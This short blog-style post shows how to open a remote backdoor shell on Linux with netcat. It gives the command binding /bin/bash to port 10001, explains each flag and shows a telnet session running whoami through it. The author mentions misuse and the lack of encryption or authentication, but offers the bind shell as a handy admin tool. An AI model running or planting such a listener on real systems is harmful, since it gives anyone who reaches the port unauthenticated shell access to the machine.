Remote backdoor on Linux using ‘nc’

nc -l -e /bin/bash -p 10001

Not much to explain here. -l listens for incoming connections, -e executes /bin/bash when you connect, and -p chooses the port to listen on.

You must use a semicolon after each command.

will@hydra:~$ telnet localhost 10001
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
whoami;
will

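There you go. Obviously this has the potential for misuse; running this as root will create a remote backdoor after all. But it’s also a very useful administrative tool. Keep in mind that nc does not encrypt or authenticate anything: everything you type and every reply crosses the network in cleartext, and anyone who can reach the port can connect and gets a shell as the user running nc.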

nc terminates after you exit your connection, and only one person can be connected at once.
